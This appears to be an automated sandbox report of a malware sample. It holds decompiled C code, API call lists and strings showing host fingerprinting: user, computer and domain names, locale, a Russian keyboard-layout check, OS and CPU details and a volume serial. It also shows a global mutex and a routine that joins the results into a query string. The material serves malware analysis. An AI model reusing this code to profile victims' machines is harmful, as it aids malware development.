0x00407282
0x0040728b
0x0040729e
0x004072a4
0x004072a9
0x004072c7
0x004072ab
0x004072c2
0x004072c2
0x004072da
0x004072e1
0x004072e1
0x004072f3
0x004074a0
0x004074a7
0x004074f0
0x004074f9
0x004074f9
0x004074b7
0x004074bd
0x004074c5
0x004074e4
0x004074e4
0x00000000
0x004074e4
0x004074c7
0x004074c9
0x004074d0
0x00000000
0x00000000
0x004074de
0x00000000
0x004072f9
0x00407307
0x0040730e
0x00407315
0x0040731c
0x00407323
0x0040732a
0x00407331
0x0040733a
0x0040733d
0x00407340
0x00407345
0x00407345
0x00407348
0x0040734b
0x0040734c
0x00407352
0x00407357
0x0040735a
0x0040735f
0x00407362
0x00407364
0x00407370
0x00407375
0x00407383
0x00407388
0x00407399
0x004073a4
0x004073b2
0x004073b6
0x004073c0
0x004073de
0x00407479
0x00000000
0x00407479
0x00407400
0x00407403
0x00407405
0x0040740a
0x00407416
0x00407419
0x0040741b
0x0040741e
0x00407427
0x00407438
0x00407446
0x00407448
0x0040745a
0x00407462
0x0040746d
0x0040746d
0x00407484
0x00407485
0x00407488
0x00407494
0x00407496
0x0040749b
0x00000000
0x0040749b
0x004072f3
0x004070e0
0x004070f1
0x004070f3
0x004070f7
0x004070fd
0x00407129
0x00407129
0x0040712e
0x0040712f
0x00407131
0x00000000
0x00407131
0x004070ff
0x00407106
0x00000000
0x00407122
0x00000000
0x00000000
0x00407114
0x00000000
0x00000000
0x0040711b
0x00000000
0x00000000
0x0040710d
0x00000000
0x00000000
0x00000000
0x00000000
0x00407106
0x0040703c
0x0040703e
0x00407041
0x00407059
0x00407068
0x004070ac
0x004070ac
0x004070c4
0x004070d1
0x004070d3
0x00000000
0x004070d3
0x0040706d
0x0040708c
0x00407097
0x0040708e
0x0040708e
0x0040708e
0x004070a0
0x004070aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004070aa
0x00406f0d
0x00406f16
0x00406f20
0x00406f25
0x00406f28
0x00406f2d
0x00406f34
0x00406f40
0x00406f49
0x00406f4b
0x00406f4e
0x00406f58
0x00406f73
0x00406fe3
0x00406fe3
0x00406fe5
0x00406fed
0x00406fed
0x00000000
0x00406fed
0x00406f78
0x00406f95
0x00406fa0
0x00406f97
0x00406f97
0x00406f97
0x00406fa9
0x00406fb3
0x00000000
0x00406fb5
0x00406fc5
0x00406fea
0x00000000
0x00406fea
0x00406fcf
0x00406fd1
0x00406fd4
0x00406fd9
0x00406fdb
0x00406fde
0x00406fde
0x00406ff0
0x00406ff0
0x00406fff
0x00407009
0x0040700b
0x0040700b
0x00407018
0x00000000
0x0040701e
0x00406e6e
0x00406e70
0x00406e73
0x00406e8b
0x00406e9a
0x00406ede
0x00406ee8
0x00406eef
0x00000000
0x00406eef
0x00406e9f
0x00406ebe
0x00406ec9
0x00406ec0
0x00406ec0
0x00406ec0
0x00406ed2
0x00406edc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e02
0x00406e10
0x00406e12
0x00406e17
0x00000000
0x00000000
0x00406e19
0x00406e2f
0x00406e36
0x00406e51
0x00406e51
0x00406e53
0x00000000
0x00406e53
0x00406e38
0x00406e3f
0x00000000
0x00000000
0x00406e51
0x00000000
0x00406e51

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
GetComputerNameW.KERNEL32 ref: 00406DF0
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
wsprintfW.USER32 ref: 00406E51
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
GetLastError.KERNEL32 ref: 00406EC9
RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
VirtualFree.KERNEL32(004048B6,00000000,00008000), ref: 00406EEF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00406F0D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00406F23
wsprintfW.USER32 ref: 00406F49
RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,00404590), ref: 00406F6B
RegQueryValueExW.ADVAPI32(00404590,00000000,00000000,00000000,?,?), ref: 00406F8D
GetLastError.KERNEL32 ref: 00406FA0
RegCloseKey.ADVAPI32(00404590), ref: 00406FA9
lstrcmpiW.KERNEL32(?,00000419), ref: 00406FBD
wsprintfW.USER32 ref: 00406FCF
wsprintfW.USER32 ref: 00407009
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407018
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0040703C
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00407060
RegQueryValueExW.ADVAPI32(?,productName,00000000,00000000,00404590,?), ref: 00407084
GetLastError.KERNEL32 ref: 00407097
RegCloseKey.ADVAPI32(?), ref: 004070A0
wsprintfW.USER32 ref: 004070D1
GetNativeSystemInfo.KERNEL32(?), ref: 004070E0
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 004070F1
wsprintfW.USER32 ref: 0040712F
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0040716D
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 00407180
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00407194
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 004071D4
RegOpenKeyExW.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 004071F6
RegQueryValueExW.KERNELBASE(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 0040721B
GetLastError.KERNEL32 ref: 0040722E
RegCloseKey.ADVAPI32(?), ref: 00407237
lstrlenW.KERNEL32(00000000), ref: 00407246

Part of subcall function 00406D10: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
Part of subcall function 00406D10: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
Part of subcall function 00406D10: RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57

wsprintfW.USER32 ref: 0040727A
lstrcatW.KERNEL32(?,00000000), ref: 0040728B
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00407297
GetProcAddress.KERNEL32(00000000), ref: 0040729E
lstrlenW.KERNEL32(?), ref: 004072AE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004072E1
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00407338
GetDriveTypeW.KERNEL32(?), ref: 0040737D
lstrcatW.KERNEL32(?,?), ref: 004073A4
lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6

Strings

Domain, xrefs: 00406E20
x64, xrefs: 0040710D
%I64u/, xrefs: 00407432
ProcessorNameString, xrefs: 0040720C
x86, xrefs: 00407122
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 00406E25
00000419, xrefs: 00406FB5
Keyboard Layout\Preload, xrefs: 00406F61
RtlComputeCrc32, xrefs: 0040728D
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 004070BA
%I64u, xrefs: 00407451
error, xrefs: 004070C9
ARM, xrefs: 00407114
Itanium, xrefs: 0040711B
ntdll.dll, xrefs: 00407292
LocaleName, xrefs: 00406EAE
Unknown, xrefs: 00407129
?:\, xrefs: 00407352
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040704F
undefined, xrefs: 00406E49
Control Panel\International, xrefs: 00406E81
productName, xrefs: 0040707C, 004070B5
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 004071EC, 0040725E
WORKGROUP, xrefs: 00406E41
@, xrefs: 00406E9F
Identifier, xrefs: 00407259

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 2088797152-983031137
Opcode ID: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
Instruction ID: bc76af88716f23ffac07bfdbeb53bd65fae384ef587bd9da7bafbc6315d7b6d0
Opcode Fuzzy Hash: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
Instruction Fuzzy Hash: 5A228570A40305AFEB209FA0CD49FAE7BB5FF04704F10442AF641B62E1D7B9A995CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004069A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

APIs

lstrcatW.KERNEL32(?,?), ref: 004069C1
lstrcatW.KERNEL32(?,004103F0), ref: 004069C9
lstrcatW.KERNEL32(?,?), ref: 004069D2
lstrcatW.KERNEL32(?,004103F4), ref: 004069DA
lstrcatW.KERNEL32(?,?), ref: 004069E5
lstrcatW.KERNEL32(?,004103F0), ref: 004069ED
lstrcatW.KERNEL32(?,?), ref: 004069F3
lstrcatW.KERNEL32(?,004103F4), ref: 004069FB
lstrcatW.KERNEL32(?,?), ref: 00406A07
lstrcatW.KERNEL32(?,004103F0), ref: 00406A0F
lstrcatW.KERNEL32(?,?), ref: 00406A15
lstrcatW.KERNEL32(?,004103F4), ref: 00406A1D
lstrcatW.KERNEL32(?,?), ref: 00406A29
lstrcatW.KERNEL32(?,004103F0), ref: 00406A31
lstrcatW.KERNEL32(?,?), ref: 00406A37
lstrcatW.KERNEL32(?,004103F4), ref: 00406A3F
lstrcatW.KERNEL32(?,?), ref: 00406A4B
lstrcatW.KERNEL32(?,004103F0), ref: 00406A53
lstrcatW.KERNEL32(?,?), ref: 00406A59
lstrcatW.KERNEL32(?,004103F4), ref: 00406A61
lstrcatW.KERNEL32(?,?), ref: 00406A6D
lstrcatW.KERNEL32(?,004103F0), ref: 00406A75
lstrcatW.KERNEL32(?,004048B6), ref: 00406A7B
lstrcatW.KERNEL32(?,004103F4), ref: 00406A83
lstrcatW.KERNEL32(?,?), ref: 00406A8F
lstrcatW.KERNEL32(?,004103F0), ref: 00406A97
lstrcatW.KERNEL32(?,?), ref: 00406A9D
lstrcatW.KERNEL32(?,004103F4), ref: 00406AA5
lstrcatW.KERNEL32(?,?), ref: 00406AB1
lstrcatW.KERNEL32(?,004103F0), ref: 00406AB9
lstrcatW.KERNEL32(?,?), ref: 00406ABF
lstrcatW.KERNEL32(?,004103F4), ref: 00406AC7
lstrcatW.KERNEL32(?,?), ref: 00406AD3
lstrcatW.KERNEL32(?,004103F0), ref: 00406ADB
lstrcatW.KERNEL32(?,?), ref: 00406AE1
lstrcatW.KERNEL32(?,004103F4), ref: 00406AE9
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00406AFC
wsprintfW.USER32 ref: 00406B16
wsprintfW.USER32 ref: 00406B27
lstrcatW.KERNEL32(?,?), ref: 00406B34
lstrcatW.KERNEL32(?,004103F0), ref: 00406B3C
lstrcatW.KERNEL32(?,?), ref: 00406B42
lstrcatW.KERNEL32(?,004103F4), ref: 00406B4A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00406B56
lstrcatW.KERNEL32(?,?), ref: 00406B66
lstrcatW.KERNEL32(?,004103F0), ref: 00406B6E
lstrcatW.KERNEL32(?,?), ref: 00406B74
lstrcatW.KERNEL32(?,004103F4), ref: 00406B7C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00406B7F

Strings

%x%x, xrefs: 00406B10
undefined, xrefs: 00406B21

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
Instruction ID: 157d45b09fe4d6cbf2a129cbf998294f04408a9e253f235917979037099c56e6
Opcode Fuzzy Hash: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
Instruction Fuzzy Hash: 80511B31281669B7CB273B658C49FDF3A19EF86700F124061F91028096CFBD9592DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404550 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
stringmemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
lstrcpyW.KERNEL32 ref: 004045CF
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B

Strings

Global\, xrefs: 004045C9

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
Instruction ID: 4f5a3050133a9d70e6d79b6919bbb594e2943cbf5e181e58d482f905f9ddffb5
Opcode Fuzzy Hash: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
Instruction Fuzzy Hash: 6721D4B16503217BE224A724DC4BF6F7A5CDB80744F500639F706761D0EAB87D0486EE

Uniqueness

Uniqueness Score: -1.00%

Function 00407720 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407720(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407739
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040774B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040775D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040776F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407781
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407793
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077A5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077B7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077C9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077E1

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
Instruction ID: 79a2428a1de1d862086b34f36251e2aa8ec78ad52842245a2806986d354140b0
Opcode Fuzzy Hash: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
Instruction Fuzzy Hash: C7211C30280B04AAF7762B15CC4AF66B2E1BB40B45F254839F2C1395F08BF97889DF09

Uniqueness

Uniqueness Score: -1.00%

Function 00406D10 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x00406d26
0x00406d30
0x00406d84
0x00406d32
0x00406d35
0x00406d47
0x00406d4f
0x00406d66
0x00406d6f
0x00406d7b
0x00406d51
0x00406d54
0x00406d57
0x00406d63
0x00406d63
0x00406d4f

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
